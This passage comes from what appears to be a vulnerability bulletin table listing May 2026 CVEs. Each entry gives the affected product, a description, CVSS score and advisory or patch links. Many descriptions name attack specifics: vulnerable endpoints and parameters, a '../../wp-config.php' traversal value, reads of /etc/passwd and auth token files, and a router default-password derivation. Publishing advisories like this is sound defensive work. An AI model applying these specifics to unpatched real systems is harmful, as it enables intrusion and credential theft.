| Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc.--Library Automation System | Improper Control of Generation of Code ('Code Injection') vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Remote Code Inclusion. This issue affects Library Automation System: from v.19.5 before v.22.1. | 2026-05-14 | 8.8 | CVE-2025-15024 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240 |
| Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc.--Library Automation System | Authorization bypass through User-Controlled key vulnerability in Yordam Information Technology Consulting, Training and Electronic Systems Industry and Trade Inc. Library Automation System allows Exploitation of Trusted Identifiers. This issue affects Library Automation System: from v.21.6 before v.22.1. | 2026-05-14 | 8.8 | CVE-2025-15025 | https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0240 |
| wende60--Redaxo CMS Addon MyEvents | Redaxo CMS Addon MyEvents 2.2.1 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the myevents_id parameter. Attackers can send GET requests to the event_add.php page with malicious myevents_id values to extract or modify sensitive database information. | 2026-05-17 | 7.1 | CVE-2018-25319 | ExploitDB-44261 Official Product Homepage VulnCheck Advisory: Redaxo CMS Addon MyEvents 2.2.1 SQL Injection via event_add.php |
| woocommerce-csvimport--WooCommerce CSV-Importer | Woocommerce CSV Importer 3.3.6 contains a path traversal vulnerability that allows any registered user to delete arbitrary files by submitting unescaped filenames through the delete_export_file AJAX action. Attackers can craft POST requests with directory traversal sequences in the filename parameter to delete sensitive files like wp-config.php outside the intended export directory. | 2026-05-17 | 7.5 | CVE-2018-25325 | ExploitDB-44433 Official Product Homepage VulnCheck Advisory: Woocommerce CSV Importer 3.3.6 Path Traversal File Deletion |
| wp-google-drive--Google Drive | Google Drive for WordPress 2.2 contains a path traversal vulnerability that allows unauthenticated attackers to read arbitrary files by injecting directory traversal sequences in the file_name parameter. Attackers can send POST requests to gdrive-ajaxs.php with the ajaxstype parameter set to del_fl_bkp and file_name containing traversal sequences ../../wp-config.php to access sensitive configuration files. | 2026-05-17 | 7.5 | CVE-2018-25326 | ExploitDB-44435 Official Product Homepage VulnCheck Advisory: Google Drive for WordPress 2.2 Path Traversal RCE via gdrive-ajaxs.php |
| wp-with-spritz--WP with Spritz | WordPress Plugin WP with Spritz 1.0 contains a remote file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by injecting file paths into the url parameter. Attackers can send GET requests to wp.spritz.content.filter.php with malicious url values to access sensitive files like system configuration and credentials. | 2026-05-17 | 7.5 | CVE-2018-25329 | ExploitDB-44544 Product Reference VulnCheck Advisory: WordPress Plugin WP with Spritz 1.0 Remote File Inclusion |
| Fabrikar--com_fabrik | Joomla com_fabrik 3.9.11 contains a directory traversal vulnerability that allows unauthenticated attackers to list arbitrary files by manipulating the folder parameter. Attackers can send GET requests to the onAjax_files method with path traversal sequences to enumerate files in system directories outside the intended web root. | 2026-05-13 | 7.5 | CVE-2020-37219 | ExploitDB-48263 Official Product Homepage Product Reference VulnCheck Advisory: Joomla com_fabrik 3.9.11 Directory Traversal via image.php |
| www.huawei.com--Huawei HG630 Router | Huawei HG630 V2 router contains an authentication bypass vulnerability that allows unauthenticated attackers to obtain administrative access by retrieving the device serial number. Attackers can query the /api/system/deviceinfo endpoint without authentication to extract the SerialNumber field, then use the last 8 characters as the default password to login to the router. | 2026-05-13 | 7.5 | CVE-2020-37220 | ExploitDB-48310 Reference VulnCheck Advisory: Huawei HG630 V2 Router Authentication Bypass via Serial Number |
| Kuicms--Kuicms Php EE | Kuicms Php EE 2.0 contains a persistent cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting crafted content through the bbs reply endpoint. Attackers can send POST requests to /web/?c=bbs&a=reply with HTML and JavaScript payloads in the content parameter to execute arbitrary scripts in users' browsers. | 2026-05-13 | 7.2 | CVE-2020-37222 | ExploitDB-48526 Official Product Homepage Product Reference VulnCheck Advisory: Kuicms Php EE 2.0 Persistent Cross-Site Scripting via bbs reply |
| Iobit--IObit Uninstaller | IObit Uninstaller 9.5.0.15 contains an unquoted service path vulnerability in the IObitUnSvr service that allows local attackers to escalate privileges to SYSTEM level. Attackers can place a malicious executable named IObit.exe in the C:\Program Files (x86)\IObit directory and restart the service to execute code with SYSTEM privileges. | 2026-05-13 | 7.8 | CVE-2020-37223 | ExploitDB-48543 Official Product Homepage Product Reference VulnCheck Advisory: IObit Uninstaller 9.5.0.15 Unquoted Service Path Privilege Escalation |
| Joomsky--J2 JOBS | Joomla J2 JOBS 1.3.0 contains an authenticated SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'sortby' parameter. Attackers can send POST requests to the administrator index with malicious 'sortby' values to extract sensitive database information. | 2026-05-13 | 7.1 | CVE-2020-37224 | ExploitDB-48648 Official Product Homepage Product Reference VulnCheck Advisory: Joomla J2 JOBS 1.3.0 Authenticated SQL Injection via sortby |
| Joomsky--J2 JOBS | Joomla J2 JOBS 1.3.0 contains an authenticated SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'sortby' parameter. Attackers can send POST requests to the administrator index with malicious 'sortby' values to extract sensitive database information using automated tools. | 2026-05-13 | 7.1 | CVE-2020-37226 | ExploitDB-48670 Official Product Homepage Product Reference VulnCheck Advisory: Joomla J2 JOBS 1.3.0 Authenticated SQL Injection via sortby |
| Oki--OKI sPSV Port Manager | OKI sPSV Port Manager 1.0.41 contains an unquoted service path vulnerability in the sPSVOpLclSrv service that allows local attackers to escalate privileges by inserting executable files into the unquoted path. Attackers can place a malicious executable in a directory within the service path that will execute with LocalSystem privileges when the service restarts or the system reboots. | 2026-05-16 | 7.8 | CVE-2020-37229 | ExploitDB-49005 Official Product Homepage Product Reference VulnCheck Advisory: OKI sPSV Port Manager 1.0.41 Unquoted Service Path Privilege Escalation |
| Syncplify--Syncplify.me Server! | Syncplify.me Server! 5.0.37 contains an unquoted service path vulnerability in the SMWebRestServicev5 service that allows local attackers to escalate privileges by exploiting the unquoted binary path. Attackers can insert a malicious executable into the service path and execute it with LocalSystem privileges when the service restarts or the system reboots. | 2026-05-16 | 7.8 | CVE-2020-37230 | ExploitDB-49009 Official Product Homepage Product Reference VulnCheck Advisory: Syncplify.me Server! 5.0.37 Unquoted Service Path Privilege Escalation |
| Cybertronsoft--Privacy Drive | Privacy Drive 3.17.0 contains an unquoted service path vulnerability in the pdsvc.exe service binary that allows local attackers to escalate privileges by exploiting the service startup process. Attackers can place malicious executables in the unquoted path directories to execute arbitrary code with LocalSystem privileges during service startup or system reboot. | 2026-05-16 | 7.8 | CVE-2020-37231 | ExploitDB-49023 Official Product Homepage Product Reference VulnCheck Advisory: Privacy Drive 3.17.0 Unquoted Service Path Privilege Escalation |
| Iobit--Advanced System Care Service | Advanced System Care Service 13.0.0.157 contains an unquoted service path vulnerability in the AdvancedSystemCareService13 service binary path that allows local attackers to escalate privileges. Attackers can place malicious executables in the system root path that will be executed with LocalSystem privileges during service startup or system reboot. | 2026-05-16 | 7.8 | CVE-2020-37232 | ExploitDB-49049 Official Product Homepage Product Reference VulnCheck Advisory: Advanced System Care Service 13.0.0.157 Unquoted Service Path Privilege Escalation |
| Supsystic--Digital Publications | Supsystic Digital Publications 1.6.9 contains a path traversal vulnerability in the Folder input field that allows attackers to access files outside the web root by injecting directory traversal sequences. Additionally, the plugin fails to sanitize input fields in publication settings, allowing stored cross-site scripting attacks through script injection in parameters like Area Width and Publication Width that execute when publications are viewed or edited. | 2026-05-16 | 7.5 | CVE-2020-37245 | ExploitDB-49542 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Supsystic Digital Publications 1.6.9 Path Traversal XSS |
| Kite--Kite | Kite 4.2.0.1 U1 contains an unquoted service path vulnerability in the KiteService Windows service that allows local attackers to escalate privileges by exploiting the service binary path. Attackers can place a malicious executable in the Program Files directory to be executed with LocalSystem privileges when the service starts. | 2026-05-16 | 7.8 | CVE-2020-37247 | ExploitDB-50975 Official Product Homepage VulnCheck Advisory: Kite 4.2.0.1 U1 Unquoted Service Path Privilege Escalation |
| Home-Assistant--Home Assistant Community Store (HACS) | Home Assistant Community Store (HACS) 1.10.0 contains a path traversal vulnerability that allows unauthenticated attackers to read sensitive files by traversing directories via the /hacsfiles/ endpoint. Attackers can retrieve the .storage/auth file containing user credentials and refresh tokens, then craft valid JWT tokens to gain administrative access to Home Assistant instances. | 2026-05-16 | 7.5 | CVE-2021-47942 | ExploitDB-49495 Official Product Homepage Product Reference VulnCheck Advisory: Home Assistant Community Store 1.10.0 Path Traversal Account Takeover |
| Wpgraphql--WPGraphQL | WordPress Plugin WPGraphQL 1.3.5 contains a denial of service vulnerability that allows unauthenticated attackers to exhaust server resources by sending batched GraphQL queries with duplicated fields. Attackers can send POST requests to the GraphQL endpoint with amplified field duplication payloads to trigger server out-of-memory conditions and MySQL connection errors. | 2026-05-15 | 7.5 | CVE-2021-47959 | ExploitDB-49807 Official Product Homepage VulnCheck Advisory: WordPress Plugin WPGraphQL 1.3.5 Denial of Service |
| AnotherNote--Anote | Anote 1.0 contains a persistent cross-site scripting vulnerability that allows attackers to execute arbitrary code by injecting malicious payloads into markdown files stored within the application. Attackers can craft malicious markdown files with embedded JavaScript that executes system commands when opened, enabling remote code execution on the victim's computer. | 2026-05-15 | 7.2 | CVE-2021-47963 | ExploitDB-49836 Official Product Homepage VulnCheck Advisory: Anote 1.0 Persistent Cross-Site Scripting Remote Code Execution |
| color-notes--Color Notes | Color Notes 1.4 contains a denial of service vulnerability that allows attackers to crash the application by pasting excessively long character strings into note fields. Attackers can generate a payload containing 350,000 repeated characters and paste it twice into a new note to cause the application to stop responding. | 2026-05-16 | 7.5 | CVE-2021-47969 | ExploitDB-49952 VulnCheck Advisory: Color Notes 1.4 Denial of Service via Long Character String |
| macaron-notes-great-notebook--Macaron Notes Gear Notebook | Macaron Notes 5.5 contains a denial of service vulnerability that allows attackers to crash the application by creating notes with excessively long character strings. Attackers can generate a payload containing 350000 repeated characters and paste it into a note field to trigger application crash and stop functionality. | 2026-05-16 | 7.5 | CVE-2021-47970 | ExploitDB-49953 VulnCheck Advisory: Macaron Notes 5.5 Denial of Service via Buffer Overflow |
| my-notes-safe--My Notes Safe | My Notes Safe 5.3 contains a denial of service vulnerability that allows attackers to crash the application by pasting excessively long character strings into note fields. Attackers can generate a payload containing 350000 repeated characters and paste it twice into a new note to trigger an application crash. | 2026-05-16 | 7.5 | CVE-2021-47971 | ExploitDB-49954 VulnCheck Advisory: My Notes Safe 5.3 Denial of Service via Buffer Overflow |
| sticky-notes-color-widgets--Sticky Notes Color Widgets | Sticky Notes & Color Widgets 1.4.2 contains a denial of service vulnerability that allows attackers to crash the application by creating notes with excessively long character strings. Attackers can paste large payloads of repeated characters into note fields to trigger application crashes and make the application stop responding. | 2026-05-16 | 7.5 | CVE-2021-47972 | ExploitDB-49957 VulnCheck Advisory: Sticky Notes & Color Widgets 1.4.2 Denial of Service |
| sticky-notes--Sticky Notes Widget | Sticky Notes Widget 3.0.6 contains a denial of service vulnerability that allows attackers to crash the application by pasting excessively long character strings into note fields. Attackers can generate a payload containing 350000 repeated characters and paste it twice into a new note to trigger an application crash on iOS devices. | 2026-05-16 | 7.5 | CVE-2021-47973 | ExploitDB-49978 VulnCheck Advisory: Sticky Notes Widget 3.0.6 Denial of Service via Buffer Overflow |
| Vxsearch--VX Search | VX Search 13.5.28 contains an unquoted service path vulnerability in both VX Search Server and VX Search Enterprise services that allows local attackers to escalate privileges. Attackers can place malicious executables in unquoted path directories like C:\Program Files\VX Search to execute arbitrary code with LocalSystem privileges when services restart. | 2026-05-16 | 7.8 | CVE-2021-47974 | ExploitDB-50026 Official Product Homepage VulnCheck Advisory: VX Search 13.5.28 Unquoted Service Path Privilege Escalation |
| Wplearnmanager--WP Learn Manager | WP Learn Manager 1.1.2 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the fieldtitle parameter. Attackers can submit POST requests to the jslm_fieldordering page with XSS payloads in the fieldtitle field to execute arbitrary JavaScript when administrators view the field ordering interface. | 2026-05-16 | 7.2 | CVE-2021-47975 | ExploitDB-50086 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin WP Learn Manager 1.1.2 Stored XSS |
| Gotmls--Malware Security and Bruteforce Firewall | WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 contains a directory traversal vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating the file parameter. Attackers can send requests to the duplicator_download action via admin-ajax.php with path traversal sequences to access sensitive system files outside the intended directory. | 2026-05-16 | 7.5 | CVE-2021-47977 | ExploitDB-50107 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Anti-Malware Security Bruteforce Firewall 4.20.59 Directory Traversal |
| Getfuelcms--Fuel CMS | Fuel CMS 1.4.13 contains a blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'col' parameter in the Activity Log interface. Attackers can send requests to the logs endpoint with malicious SQL payloads in the 'col' parameter to extract database information based on response time delays. | 2026-05-16 | 7.1 | CVE-2021-47980 | ExploitDB-50523 Official Product Homepage Product Reference VulnCheck Advisory: Fuel CMS 1.4.13 Blind SQL Injection via col Parameter |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.5 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to cause denial of service by sending specially crafted payloads on certain API endpoints. | 2026-05-14 | 7.5 | CVE-2025-14869 | HackerOne Bug Bounty Report #3447146 https://gitlab.com/gitlab-org/gitlab/-/work_items/584489 https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.5 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to cause denial of service by sending specially crafted JSON payloads due to insufficient input validation. | 2026-05-14 | 7.5 | CVE-2025-14870 | HackerOne Bug Bounty Report #3446641 https://gitlab.com/gitlab-org/gitlab/-/work_items/584490 https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/ |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Simple-Fields--Simple Fields | Simple Fields 0.2 through 0.3.5 WordPress Plugin contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by injecting null bytes into the wp_abspath parameter on PHP versions before 5.3.4. Attackers can supply malicious wp_abspath values to simple_fields.php to include files like /etc/passwd or inject PHP code into Apache logs for remote code execution when allow_url_include is enabled. | 2026-05-17 | 6.2 | CVE-2018-25324 | ExploitDB-44425 Official Product Homepage Product Reference VulnCheck Advisory: Simple Fields 0.2-0.3.5 Local File Inclusion via wp_abspath |
| zenar--Zenar Content Management System | Zenar Content Management System contains a cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating form parameters in POST requests. Attackers can inject script tags through the current_page parameter sent to the ajax.php endpoint, which reflects unsanitized user input in the response HTML to execute arbitrary JavaScript in victim browsers. | 2026-05-17 | 6.1 | CVE-2018-25331 | ExploitDB-44664 Official Product Homepage Product Reference VulnCheck Advisory: Zenar Content Management System Cross-Site Scripting via ajax.php |
| Powie--WHOIS Domain Check | Powie's WHOIS Domain Check 0.9.31 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by exploiting unsanitized input fields in plugin settings. Attackers can submit malicious payloads through textarea and input elements in the pwhois_settings.php configuration page to execute JavaScript in the admin context and escalate privileges. | 2026-05-13 | 6.4 | CVE-2020-37225 | ExploitDB-48656 Official Product Homepage Official Product Homepage Product Reference VulnCheck Advisory: Powie's WHOIS Domain Check 0.9.31 Persistent Cross-Site Scripting |
| Wordpress--Buddypress | WordPress Plugin Buddypress 6.2.0 contains a persistent cross-site scripting vulnerability that allows authenticated attackers with moderator privileges to inject malicious script code through the figure parameter in wp:html blocks. Attackers can inject iframe elements with event handlers like onload that execute when administrators or privileged users preview or view the affected page content, enabling session hijacking and persistent phishing attacks. | 2026-05-16 | 6.4 | CVE-2020-37233 | ExploitDB-49061 Official Product Homepage VulnCheck Advisory: WordPress Plugin Buddypress 6.2.0 Persistent Cross-Site Scripting |
| Internetdownloadmanager--Internet Download Manager | Internet Download Manager 6.38.12 contains a buffer overflow vulnerability in the Scheduler component that allows local attackers to crash the application by supplying oversized input. Attackers can paste malicious data exceeding 5000 bytes into the 'Open the following file when done' field to trigger a denial of service condition. | 2026-05-16 | 6.2 | CVE-2020-37234 | ExploitDB-49083 Official Product Homepage Product Reference VulnCheck Advisory: Internet Download Manager 6.38.12 Scheduler Buffer Overflow |
| themeftc--Theme Wibar | WordPress Theme Wibar 1.1.8 contains a stored cross-site scripting vulnerability in the Brand component that allows authenticated users to inject malicious scripts by manipulating the Logo URL parameter. Attackers with editor, administrator, contributor, or author privileges can inject base64-encoded script payloads through the ftc_brand_url input field to execute arbitrary JavaScript when users visit the brand page. | 2026-05-16 | 6.4 | CVE-2020-37235 | ExploitDB-49107 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Theme Wibar 1.1.8 Stored Cross-Site Scripting via Brand Component |
| Netartmedia--NewsLister | NewsLister contains an authenticated persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts through the title parameter in the news addition interface. Attackers can inject JavaScript payloads via the title field in the admin panel that execute when news items are viewed by other users. | 2026-05-16 | 6.4 | CVE-2020-37236 | ExploitDB-49160 Official Product Homepage VulnCheck Advisory: NewsLister Authenticated Persistent Cross-Site Scripting via Admin Panel |
| Compo--Composr CMS | Composr CMS 10.0.34 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts through the banner management interface. Attackers with admin credentials can inject XSS payloads in the Description field of the Add banner functionality, which execute for all website visitors when they access the home page. | 2026-05-16 | 6.4 | CVE-2020-37237 | ExploitDB-49190 Official Product Homepage Product Reference VulnCheck Advisory: Composr CMS 10.0.34 Persistent Cross-Site Scripting via banners |
| Cmsmadesimple--CMS Made Simple | CMS Made Simple 2.2.15 contains a stored cross-site scripting vulnerability that allows authenticated users with Content Manager access to inject malicious scripts through SVG file uploads. Attackers can upload SVG files containing embedded JavaScript to the file manager, which executes when other authenticated users access the uploaded file, enabling cookie theft and session hijacking. | 2026-05-16 | 6.4 | CVE-2020-37238 | ExploitDB-49199 Official Product Homepage Product Reference VulnCheck Advisory: CMS Made Simple 2.2.15 Stored XSS via SVG File Upload |
| Codekernel--Queue Management System | Queue Management System 4.0.0 contains a stored cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts through user creation fields. Attackers can insert JavaScript payloads in the First Name, Last Name, and Email fields during user creation, which execute when viewing the User List page. | 2026-05-16 | 6.4 | CVE-2020-37240 | ExploitDB-49296 Official Product Homepage Product Reference VulnCheck Advisory: Queue Management System 4.0.0 Stored XSS via Add User |
| Supsystic--Backup | Supsystic Backup 2.3.9 contains a local file inclusion vulnerability that allows unauthenticated attackers to read and delete arbitrary files by manipulating the download path parameter. Attackers can modify the download parameter in admin.php requests with directory traversal sequences to access sensitive files like /etc/passwd or delete files via the removeAction parameter. | 2026-05-16 | 6.2 | CVE-2020-37246 | ExploitDB-49545 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Supsystic Backup 2.3.9 Local File Inclusion |
| Cookielawinfo--Cookie Law Bar | Cookie Law Bar 1.2.1 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting unsanitized input to the Bar Message field. Attackers can inject script payloads through the plugin settings page that execute in the browsers of all WordPress users viewing the site, enabling cookie theft and sensitive data exfiltration. | 2026-05-16 | 6.4 | CVE-2021-47957 | ExploitDB-49905 Official Product Homepage Product Reference VulnCheck Advisory: WordPress Plugin Cookie Law Bar 1.2.1 Stored XSS via clb_bar_msg |
| savsofts--Savsoft Quiz | Savsoft Quiz 5.0 contains a persistent cross-site scripting vulnerability in the user account settings page that allows authenticated attackers to inject malicious HTML and JavaScript code. Attackers can inject script payloads into user profile fields at the edit_user endpoint, which execute in the browsers of users viewing the affected profile after submission. | 2026-05-15 | 6.4 | CVE-2021-47962 | ExploitDB-49825 Official Product Homepage Product Reference VulnCheck Advisory: Savsoft Quiz 5.0 Persistent Cross-Site Scripting via User Settings |
| Timeclock--PHP Timeclock | PHP Timeclock 1.04 contains multiple cross-site scripting vulnerabilities that allow unauthenticated attackers to inject arbitrary JavaScript by manipulating URL paths and POST parameters. Attackers can append malicious payloads to login.php, timeclock.php, audit.php, and timerpt.php endpoints, or inject code through from_date and to_date parameters in report requests to execute scripts in user browsers. | 2026-05-15 | 6.1 | CVE-2021-47967 | ExploitDB-49853 Official Product Homepage Product Reference VulnCheck Advisory: PHP Timeclock 1.04 Multiple Cross-Site Scripting via Parameters |
| Podcastgenerator--Podcast Generator | Podcast Generator 3.1 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting unfiltered JavaScript code in the long_description parameter. Attackers can inject script tags through episode creation or editing requests to execute arbitrary JavaScript when other users view the episode details. | 2026-05-15 | 6.4 | CVE-2021-47968 | ExploitDB-49866 Official Product Homepage Product Reference VulnCheck Advisory: Podcast Generator 3.1 Persistent Cross-Site Scripting via long_description |
| Processmaker--ProcessMaker | ProcessMaker 3.5.4 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting improper path traversal validation. Attackers can send requests with directory traversal sequences to access sensitive system files like /etc/passwd without authentication. | 2026-05-16 | 6.2 | CVE-2021-47978 | ExploitDB-50229 Official Product Homepage VulnCheck Advisory: ProcessMaker 3.5.4 Local File Inclusion via Path Traversal |
| interactivegeomaps--MapGeo Interactive Geo Maps | The MapGeo - Interactive Geo Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'map' parameter in the display-map shortcode in all versions up to, and including, 1.6.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-14 | 6.1 | CVE-2025-15345 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bfccbf41-c861-4bf1-b400-7858cb255b9a?source=cve https://research.cleantalk.org/cve-2025-15345 https://plugins.trac.wordpress.org/changeset?old_path=/interactive-geo-maps/tags/1.6.27/src/Plugin/Map.php&new_path=/interactive-geo-maps/tags/1.6.28/src/Plugin/Map.php |
| hwk-fr--Advanced Custom Fields: Extended | The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.9.2.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2026-05-12 | 6.5 | CVE-2025-15463 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f8544784-1994-47e2-be39-568d0ab9ee00?source=cve https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-action-email.php#L111 https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-front-render.php#L35 |
| Joomsky--JS Jobs | Joomla! Component Js Jobs 1.2.0 contains a cross-site request forgery vulnerability that allows attackers to perform state-changing actions without token validation. Attackers can craft malicious HTML forms targeting administrative endpoints like job.jobenforcedelete to delete job entries or modify component settings when administrators visit attacker-controlled pages. | 2026-05-17 | 5.3 | CVE-2018-25327 | ExploitDB-44492 Official Product Homepage Product Reference VulnCheck Advisory: Joomla! Component Js Jobs 1.2.0 Cross-Site Request Forgery |
| Bylancer--Zechat | Zechat 1.5 contains a Cross-Site Request Forgery (CSRF) vulnerability that allows an attacker to change a user's information by bypassing anti-CSRF protections. The application uses a CSRF token, but an attacker can use the hashtag parameter to inject an encoded payload and bypass the CSRF protection, allowing for unauthorized changes to user data. This can be exploited by tricking a user into submitting a crafted form or by using a script to obtain and set the CSRF token. | 2026-05-17 | 5.4 | CVE-2018-25334 | ExploitDB-44685 Official Product Homepage VulnCheck Advisory: Zechat 1.5 Cross-Site Request Forgery (CSRF) via hashtag parameter |
| Joomlaextensions--Joomla! extension jCart for OpenCart | Joomla jCart for OpenCart 2.3.0.2 contains a cross-site request forgery vulnerability that allows attackers to modify user account information without authentication. Attackers can craft malicious HTML forms targeting endpoints , and to change user credentials, passwords, and affiliate account details when victims visit the attacker-controlled page. | 2026-05-17 | 5.3 | CVE-2018-25336 | ExploitDB-44788 Official Product Homepage Product Reference VulnCheck Advisory: Joomla jCart for OpenCart 2.3.0.2 Cross-Site Request Forgery |
| Ultimate Member--ultimate-member | WordPress Plugin ultimate-member 2.1.3 contains a local file inclusion vulnerability that allows authenticated attackers to include arbitrary files by manipulating the pack parameter in class-admin-upgrade.php. Attackers can send POST requests with malicious pack values to include unintended PHP files from the packages directory and execute arbitrary code. | 2026-05-13 | 5.5 | CVE-2020-37169 | ExploitDB-48065 VulnCheck Advisory: WordPress Plugin ultimate-member 2.1.3 Local File Inclusion |
| HUSKY--Products Filter Professional for WooCommerce | WOOF Products Filter for WooCommerce 1.2.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by entering XSS payloads in design tab textfields. Attackers can inject JavaScript code through fields like 'Text for block toggle' and 'Custom front css styles' that executes on frontend pages when saved, affecting all site visitors. | 2026-05-13 | 5.5 | CVE-2020-37174 | ExploitDB-48088 Official Product Homepage Product Reference VulnCheck Advisory: WOOF Products Filter for WooCommerce 1.2.3 Persistent XSS |
| Bloofox--bloofoxCMS | bloofoxCMS 0.5.2.1 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions by tricking logged-in users into visiting malicious pages. Attackers can craft hidden forms targeting the admin user creation endpoint to add new administrative accounts with arbitrary credentials without requiring explicit user consent. | 2026-05-16 | 5.3 | CVE-2020-37241 | ExploitDB-49507 Official Product Homepage Product Reference VulnCheck Advisory: bloofoxCMS 0.5.2.1 Cross-Site Request Forgery via user add |
| MyBB--MyBB Timeline Plugin | MyBB Timeline Plugin 1.0 contains cross-site scripting vulnerabilities that allow attackers to inject malicious scripts through thread titles, post content, and user profile fields like Location and Bio. Attackers can also exploit a cross-site request forgery vulnerability in the timeline.php profile action to change a user's cover picture by crafting malicious forms that execute when victims visit affected profiles. | 2026-05-16 | 5.3 | CVE-2021-47934 | ExploitDB-49467 Product Reference VulnCheck Advisory: MyBB Timeline Plugin 1.0 Cross-Site Scripting and CSRF |
| CouchCMS--CouchCMS | CouchCMS 2.2.1 contains a cross-site scripting vulnerability that allows authenticated attackers to execute arbitrary JavaScript by uploading malicious SVG files through the file upload functionality. Attackers can upload SVG files containing embedded script tags to the browse.php endpoint, which are then executed in users' browsers when the files are accessed or previewed. | 2026-05-16 | 5.4 | CVE-2021-47955 | ExploitDB-49636 Official Product Homepage VulnCheck Advisory: CouchCMS 2.2.1 Cross-Site Scripting via SVG File Upload |
| Opensolution--Quick.CMS | Quick.CMS 6.7 contains a cross-site scripting vulnerability in the sliders form that allows authenticated attackers to inject malicious scripts by submitting XSS payloads through the sDescription parameter. Attackers can craft CSRF forms targeting the admin.php?p=sliders-form endpoint to execute arbitrary JavaScript in victim browsers when the form is submitted. | 2026-05-16 | 5.4 | CVE-2021-47981 | ExploitDB-50530 Official Product Homepage Product Reference VulnCheck Advisory: Quick.CMS 6.7 Cross-Site Scripting via CSRF to Sliders Form |
| WSO2--WSO2 Identity Server | The check user account lock states feature within the email OTP flow fails to validate user input, allowing an attacker to infer the existence of registered user accounts. The discovery of valid usernames can increase the risk of brute-force and social engineering attacks. Attackers can leverage this information to craft targeted phishing campaigns or other malicious activities aimed at tricking users into divulging sensitive data, potentially damaging the organization's reputation and leading to regulatory non-compliance and financial consequences. | 2026-05-11 | 5.3 | CVE-2024-0391 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3115/ |
| Siemens--SIPROTEC 5 6MD84 (CP300) | A vulnerability has been identified in SIPROTEC 5 6MD84 (CP300) (All versions < V11.0), SIPROTEC 5 6MD85 (CP200) (All versions), SIPROTEC 5 6MD85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 6MD86 (CP200) (All versions), SIPROTEC 5 6MD86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 6MD89 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 6MU85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7KE85 (CP200) (All versions), SIPROTEC 5 7KE85 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SA82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SA82 (CP150) (All versions < V11.0), SIPROTEC 5 7SA84 (CP200) (All versions), SIPROTEC 5 7SA86 (CP200) (All versions), SIPROTEC 5 7SA86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SA87 (CP200) (All versions), SIPROTEC 5 7SA87 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SD82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SD82 (CP150) (All versions < V11.0), SIPROTEC 5 7SD84 (CP200) (All versions), SIPROTEC 5 7SD86 (CP200) (All versions), SIPROTEC 5 7SD86 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SD87 (CP200) (All versions), SIPROTEC 5 7SD87 (CP300) (All versions >= V7.80 < V11.0), SIPROTEC 5 7SJ81 (CP100) (All versions >= V7.80), SIPROTEC 5 7SJ81 (CP150) (All versions < V11.0), SIPROTEC 5 7SJ82 (CP100) (All versions >= V7.80), SIPROTEC 5 7SJ82 (CP150) (All versions < V11.0), SIPROTEC 5 7SJ85 (CP200) (All versions), SIPROTEC 5 